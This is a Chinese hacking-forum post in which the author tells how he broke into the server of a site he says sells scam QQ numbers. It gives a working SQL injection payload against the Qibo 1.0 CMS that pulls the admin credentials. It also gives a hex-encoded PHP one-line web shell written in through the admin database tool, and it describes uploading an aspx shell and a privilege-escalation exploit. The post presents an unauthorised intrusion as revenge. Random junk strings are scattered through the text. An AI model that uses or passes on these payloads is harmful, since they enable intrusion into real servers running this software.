找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1072|回复: 0
打印 上一主题 下一主题

入侵卖靓号QQ骗子网站服务器纪实

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:08:47 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

! d; C, y x0 w0 U L
4 y; _& L& }2 ^! i! J+ @

# |$ W9 Y1 u# F; t9 t- L# v

2 M9 ]' l+ S7 t# l3 c 一、踩点寻找漏洞
9 c2 k+ R- v$ s* T3 m
闲来无事,在各个QQ靓号群求买5QQ,寻问半天无果就在百度搜索5QQ扫号找到目标www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
5 f2 r z0 ^/ B* U$ T1 E
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
4 X. p) R' ~! h' r
先注册一个用户,记住注册时候的邮箱以uid号,
, ^* T4 z; p) `- [5 l4 j9 U; N
3-1.png
: ]3 x3 a* [- g( _2 U4 z
3-2.png
- V* ^+ |1 Y" \" ]5 d9 |3 ?; n
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
' B4 R2 u4 {; i( ^# x
6 K8 |% Q! o) p7 [9 R0 itruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
5 H$ T) f7 Y3 }0 V" ~( s
这里的emailuid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
7 C T# a" s' f( t. n( p
3-3.png
; e% b& [. {. ?, q( E, t/ ?) C& H
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
2 W2 U" p3 D1 {. |
3-4.png
: Y( t/ y( W. g- `
6 i% r- M4 e3 x0 p6 b! v. [
解密进后台如图:
( z7 c8 S# i; Y/ T+ z* _5 e
3-5.png
9 F/ |. m( H. M9 i( {& c8 i6 T9 ^
5 E- k% w$ v% n( ]$ o
1 w2 | b2 o) ?( m9 Q, d8 P
二、后台getwebshell        
1 a, h1 i$ \( @/ }% L+ R
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
9 I) W% N+ i }# R" S B
$ m4 [8 f. x, L- g- \
3-6.png
7 S! [- X t! X0 d. q
# p& ]/ \; h9 n
然后点确定,添加提示
# `$ e8 M' w! O1 S
0 s) Y3 n" f X5 Q6 J8 t) A
3-7.png
9 `- i8 F3 e4 J4 n" q
4 N% }" e% i" ~+ m1 ~4 o4 Y
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
9 p/ F* V/ |9 a* `7 b; R
! Y4 s$ R+ d1 r
3-8.png
" F9 J6 U$ A/ w8 n& C; b& g% V
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
0 k, g4 b- H1 i+ Q7 `! s1 k
如图:
) w* X8 L" d! J* Z2 ?
3-9.png
$ |( Y! u" L9 w7 z; M- y7 j- T
3-10.png
. J0 V# s" O+ q0 ?3 b* ~4 I
" O, l& |% O% X6 V4 ?
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
; n5 g/ q; X/ d$ Q' e3 z* [
/ v% _1 J8 S2 K
3-11.png
. v: _" g5 T' G
; o4 e; b: d6 D+ G
三、提权进服务器
; f" {" Z$ C. H2 D# N
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
# _' Z$ E; v9 @
3-12.png
3 y5 s* X0 P$ g! V4 l. ?
" ~4 |+ U! T/ {( B0 ]& X' v* n- ?
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
1 ^$ i4 F. E$ N/ p
3-13.png
( n. m/ w3 a) E" U4 c
4 V/ ^1 J9 J& d
然后登陆服务器如图:
5 O6 y4 L6 ?4 R
% o, f8 l7 I- w) s8 p0 O9 ^) O3 `3 E
3-14.png / h% T, p1 f. e; Y. _

% U2 L- w7 v& q0 e6 {

* p$ \9 w1 G5 D' K% P
+ W6 f( b* b4 B- J
难怪普通刀连接不上,原来是有狗。
# N/ F. I; j. w K% D) j5 o
5 l5 `6 n( J, b: `0 i' @
8 } J9 V2 l2 E8 ^, r
' M& w: C* P3 Y0 p! S

8 r& ]. g* O3 v4 K

% E2 B, m; J2 ^) A B' F8 E5 P
7 J5 A3 |; r0 E" `; l# a$ [3 c

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表